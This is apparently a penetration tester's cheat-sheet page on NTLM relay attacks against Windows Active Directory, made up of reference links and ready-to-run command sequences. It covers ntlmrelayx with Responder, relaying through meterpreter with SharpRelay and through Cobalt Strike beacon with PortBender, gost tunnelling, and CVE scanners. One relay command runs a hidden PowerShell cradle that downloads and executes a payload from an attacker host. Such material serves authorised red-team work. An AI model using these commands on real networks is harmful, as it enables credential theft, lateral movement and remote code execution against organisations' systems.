# NTLM Relay

* <https://en.hackndo.com/ntlm-relay/>
* <https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/>
* <https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/>
* <https://www.secureauth.com/blog/playing-with-relayed-credentials/>
* <https://www.secureauth.com/blog/we-love-relaying-credentials-a-technical-guide-to-relaying-credentials-everywhere/>
* <https://intrinium.com/smb-relay-attack-tutorial/>
* <https://www.sans.org/blog/smb-relay-demystified-and-ntlmv2-pwnage-with-python/>
* <https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html>
* <https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire>
* <https://www.blackhillsinfosec.com/an-smb-relay-race-how-to-exploit-llmnr-and-smb-message-signing-for-fun-and-profit/>
* <https://clement.notin.org/blog/2020/11/16/ntlm-relay-of-adws-connections-with-impacket/>
* <https://luemmelsec.github.io/Relaying-101/>
* <https://www.thehacker.recipes/active-directory-domain-services/movement/lm-and-ntlm/relay>
* <https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/>
* <https://www.fortalicesolutions.com/posts/keeping-up-with-the-ntlm-relay>
* <https://offsec.almond.consulting/ldap-relays-for-initial-foothold-in-dire-situations.html>
* <https://labs.nettitude.com/blog/network-relaying-abuse-windows-domain/>
* <https://xakep.ru/2023/04/07/ntlm-relay-guide/>
* <https://xakep.ru/2023/04/11/ntlm-relay-guide-2/>
* [\[PDF\] Coercions and Relays – The First Cred is the Deepest (Gabriel Prudhomme)](https://www.blackhillsinfosec.com/wp-content/uploads/2022/09/Coercions-and-Relays-The-First-Cred-is-the-Deepest.pdf)

{% embed url="<https://youtu.be/b0lLxLJKaRs>" %}

{% file src="<https://1743652255-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MZ5E8Fq0UBQAc7rbfId%2Fuploads%2Fgit-blob-02c54d7068bddb6982bbce094f3dd50b60bc1633%2FLateral%20Movement%20using%20Credentials%20Relaying%20(taso_x).pdf?alt=media&token=be83ddcb-a219-410c-8a42-9f61de979c4a>" %}

Generate relay list with CME and enumerate local admins when relaying:

```
$ cme smb 192.168.2.0/24 --gen-relay-list relay.txt
$ ntlmrelayx.py -tf relay.txt -smb2support --enum-local-admins -of net-ntlmv2 --no-http-server --no-wcf-server --no-raw-server
```

Relay & catch hashes (via [multi-relay](https://www.thehacker.recipes/ad/movement/ntlm/relay#tips-and-tricks)):

```
$ smbserver.py -smb2support -port 8445 share `pwd`
$ ntlmrelayx.py -tf targets.txt -smb2support --no-http-server --no-wcf-server --no-raw-server
$ cat targets.txt
smb://10.10.13.37
smb://127.0.0.1:8445
```

{% hint style="info" %}
The easier way though is to use the combination of `-of/--output-file hashes.txt -ntlmchallenge 1122334455667788` options to save the hash with a predefined challenge to a file while relaying.
{% endhint %}

Relay NTLM2 responses obtained from Responder's proxy authentication to LDAP(S) (Responder's HTTP must be `Off`):

{% embed url="<https://twitter.com/theluemmel/status/1455099572305416197>" %}

```
$ ntlmrelayx.py -t ldap(s)://DC01.megacorp.local --http-port 3128 [--add-computer] / [--delegate-access [--escalate-user 'PWNED-MACHINE$']] [-socks] --no-smb-server --no-wcf-server --no-raw-server --no-dump [--no-da --no-acl --no-validate-privs]
$ sudo ./Responder.py -I eth0 -wd -P -v
```

## Relaying on Windows

### meterpreter + SharpRelay

* <https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/>
* <https://github.com/pkb1s/SharpRelay>

Divert incoming SMB traffic from Victim to Attacker's local 445 port through an elevated meterpreter session and relay it to Target via MSF SOCKS server.

1\. Add a static route to the Target through the 1st meterpreter session:

```
meterpreter > route add 192.168.1.11/32 1
```

2\. Start MSF SOCKS server:

```
msf > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf auxiliary(server/socks_proxy) > run -j
```

3\. Forward a reverse port 8445 on Victim to local port 445 on Attacker and start diverting incoming SMB traffic on Victim to Victim's local 8445 port:

```
meterpreter > portfwd add -R -L 127.0.0.1 -l 445 -p 8445
meterpreter > cd C:\\Windows\\System32\\drivers
meterpreter > upload /home/snovvcrash/www/WinDivert64.sys
msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/SharpRelay.exe
msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS relaysvc "C:\Windows\System32\drivers\WinDivert64.sys" 445 8445
msf post(windows/manage/execute_dotnet_assembly) > run
```

4\. Relay the diverted traffic to Target through SOCKS:

```
$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support
```

{% hint style="warning" %}
When ran once, the driver must be unloaded or the host rebooted before trying again. The fake service can be deleted with a PowerShell command:

```
PS > (sc.exe stop relaysvc) -and (sc.exe delete relaysvc)
```

{% endhint %}

### beacon + PortBender

* <https://github.com/praetorian-inc/PortBender>
* <https://rastamouse.me/ntlm-relaying-via-cobalt-strike/>

Set SOCKS server & port forwarding, upload WinDivert driver and configure redirection with PortBender:

```
beacon> socks 1080
beacon> rportfwd 8445 127.0.0.1 445
beacon> cd C:\Windows\System32\drivers
beacon> upload /home/snovvcrash/www/WinDivert64.sys
beacon> PortBender redirect 445 8445
```

Relay the planet:

```
$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -c "iex(new-object net.webclient).downloadstring(\"http://10.10.13.37:8080/pwn.ps1\")"'
```

Stop PortBender:

```
beacon> jobs
beacon> jobkill <JID>
beacon> kill <PID>
```

### gost (GO Simple Tunnel)

* <https://github.com/ginuerzh/gost>

```
Cmd > gost.exe -L auto://0.0.0.0:31337
$ gost -L rtcp://0.0.0.0:445/10.10.13.37:445 -F socks5://127.0.0.1:10080 [-F socks5://127.0.0.1:20080 ...] -F socks5://192.168.1.11:31337
```

## CVE-2019-1040

* <https://github.com/fox-it/cve-2019-1040-scanner/blob/master/scan.py>

```
$ python scan.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11
$ python scan.py -target-file DCs.txt MEGACORP/snovvcrash:'Passw0rd!'@placeholder.xyz
```

## CVE-2025-33073

* [\[PDF\] Reflective Kerberos Relay Attack (RedTeam Pentesting)](https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf)
* <https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/>
* <https://aegisbyte.com/resources/reflective-kerberos-relay-attack>
* <https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025>

### CVE-2025–54918

* <https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/>
* <https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1>
* <https://github.com/Wh0am123/CVE-2025-54918-POC>